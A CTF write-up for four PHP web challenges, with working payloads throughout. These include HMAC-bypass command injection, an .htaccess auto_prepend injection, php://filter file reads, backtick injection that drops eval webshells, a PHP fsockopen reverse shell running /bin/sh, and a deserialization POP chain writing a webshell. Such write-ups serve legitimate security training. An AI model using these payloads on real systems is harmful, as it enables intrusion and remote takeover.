Preface
- The web challenges were really misc; I had been busy with training for a while and had no time.
BlackCat
- The source code is inside an MP3. I don't know what the point of that is; does anyone actually put their source inside an mp3 when writing a website??? That is really tedious.
- Source code:
<?php
// Challenge source as recovered from the MP3; the die() strings are mojibake in the dump.
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('Ë•£¡3⁄41 ̧Ò2ÈÎÒÒ»Ö»¶úμÄÎ2°Í£¡');
}
$clandestine = getenv("clandestine");
// If White-cat-monitor is an array, hash_hmac() returns NULL and the key collapses
if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
    die('ÓÐÒâÃé×1⁄4£¬ÎÞÒâ»÷·¢£¬ÄãμÄÃÎÏë3⁄4ÍÊÇÄãÒaÃé×1⁄4μÄÄ¿±ê¡£ÏàÐÅ×Ô1⁄4o£¬Äã3⁄4ÍÊÇÄÇ¿ÅÉäÖаÐÐÄμÄ×Óμ ̄¡£');
}
// One-ear is concatenated straight into the shell command
echo exec("nc".$_POST['One-ear']);
A classic trick: passing an array to hash_hmac() makes it return null, so the key becomes null; then compute the HMAC with that null key to get the expected hash value.
Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=%3Bcat+flag.php&White-cat-monitor[]=1a
easyphp
Original challenge: X-NUCA'2019 Ezphp
From the last line of the code we can see that a "\nHello World" is forcibly appended to the end, which makes the .htaccess unparseable and gives a 500 error. So we use a backslash to escape the \n into an ordinary character, followed by a # comment, so that the .htaccess parses successfully. To bypass the detection we likewise use \ as a line break to get straight past the function's keyword check. Then .htaccess is prepended to every PHP file:
php_value auto_prepend_file .htaccess
- Putting it together, the payload:
php_value auto_prepend_fil\
e .htaccess
#<?php phpinfo();?>\
- exp
?content=php_value%20auto_prepend_fil\%0Ae%20.htaccess%0A%23<?php%20system('cat%20/fla'.'g');?>\&filename=.htaccess
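Why the raw-content keyword check above misses the directive, shown from the checking side as an added example (not code from the challenge or the original writeup). It assumes a hypothetical blocklist containing "file", consistent with where the payload splits the word, and reproduces the server's appended "\nHello World"; the fix is to join backslash continuations the way Apache's config parser does before checking.

```python
import re

# Constructed sample mirroring the payload above: the directive name is split by
# a backslash-newline, and the trailing backslash pulls the server-appended
# "\nHello World" onto the comment line instead of a new, invalid directive.
SUBMITTED = "php_value auto_prepend_fil\\\ne .htaccess\n#<?php phpinfo();?>\\"
WRITTEN = SUBMITTED + "\nHello World"   # what the challenge writes to disk

# Hypothetical blocklist (assumption, not the challenge's real list)
BLOCKED = ("file",)


def logical_lines(text):
    """Join backslash-continued lines into the logical lines Apache parses."""
    return re.sub(r"\\\n", "", text).split("\n")


def naive_check(text):
    """Substring check on the raw submission: defeated by the continuation."""
    return any(k in text.lower() for k in BLOCKED)


def hardened_check(text):
    """Same check, but on the normalised content Apache will actually see."""
    joined = "\n".join(logical_lines(text))
    return any(k in joined.lower() for k in BLOCKED)


def is_comment(line):
    """Apache ignores logical lines that start with '#'."""
    return line.lstrip().startswith("#")


if __name__ == "__main__":
    print("naive:", naive_check(SUBMITTED))        # False: filter bypassed
    print("hardened:", hardened_check(SUBMITTED))  # True: directive detected
    for line in logical_lines(WRITTEN):
        print(repr(line), "comment" if is_comment(line) else "directive")
```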
Easyphp2
- Looks like file inclusion.
- Reading the file with base64 or rot13 turns out to be filtered. Since include() URL-decodes once, double URL encoding could be used to bypass it here.
- Going through the PHP docs, there is another filter that can be used:
- For example:
http://183.129.189.60:10021/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
Decoded source:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>count is here</title>
    <style>
        html,
        body {
            overflow: none;
            max-height: 100vh;
        }
    </style>
</head>
<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">
    <center><img src="question.jpg" height="200" width="200" /> </center>
    <?php
    ini_set('max_execution_time', 5);
    if ($_COOKIE['pass'] !== getenv('PASS')) {
        setcookie('pass', 'PASS');
        die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
    }
    ?>
    <h1>A Counter is here, but it has someting wrong</h1>
    <form>
        <input type="hidden" value="GWHT.php" name="file">
        <textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
        <input type="submit">
    </form>
    <?php
    if (isset($_GET["count"])) {
        $count = $_GET["count"];
        if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
            die('hacker!');
        }
        // $count is spliced into a shell command inside single quotes
        echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
    }
    ?>
</body>
</html>
- index.php:
<?php
if (isset($_GET['file'])) {
    if(preg_match('/#|base64|rot13|base32|base16/i', $_GET['file'])){
        die('G0-OUT'.'<br>'.'hacker!');
    }
    // Unrestricted include: php:// wrappers other than the blocked ones still work
    require_once($_GET['file']);
} else {
    header('Location: /?file=GWHT.php');
}
The password is a blind guess: GWHT. Since $_POST and $_GET are filtered, use get_defined_vars() instead. The payload:
http://183.129.189.60:10021/?file=GWHT.php&count=%27`echo%20%22%3C?=eval(pos(pos(get_defined_vars())))?%3E%22%3E2.php`%27
- Then write a regular webshell:
http://183.129.189.60:10021/2.php?a=file_put_contents('cnm.php',base64_decode("PD9waHAgZXZhbCgkX1BPU1RbYWFdKTs/Pg%3d%3d"))%3b
- Use PHP to pop an interactive reverse shell:
<?php
$sock=fsockopen("localhost",12345); // localhost is your own public IP; the port is arbitrary
exec("/bin/sh -i <&3 >&3 2>&3");
?>
- At this point I went off to take a shower; when I came back the environment had been shut down. Oh well.
easyser
The scanner found a robots.txt
Hint:
<!-- Xiaopang says you can only get into ser.php from my home, and only with an insecure protocol! -->
- Source:
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';
class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
    }
    public function hasaki(){
        $d = '<?php die("nononon");?>';
        $a= $d. $this->text;
        @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}
/*$c=$_GET['c'];
echo $x=unserialize($c);*/
?>
- A simple POP chain:
<?php
class GWHT{
    public $hero;
}
class Yongen{ //flag.php
    // The base64-decode filter mangles the prepended die() guard, leaving only the decoded $text
    public $file = "php://filter/convert.base64-decode/resource=aaa.php";
    public $text = "aaaPD9waHAgZXZhbCgkX1BPU1Rbc10pOyAgPz4=";
}
$a = new GWHT;
$a->hero = new Yongen;   // echo on GWHT -> __toString() -> Yongen::hasaki()
echo urlencode(serialize($a));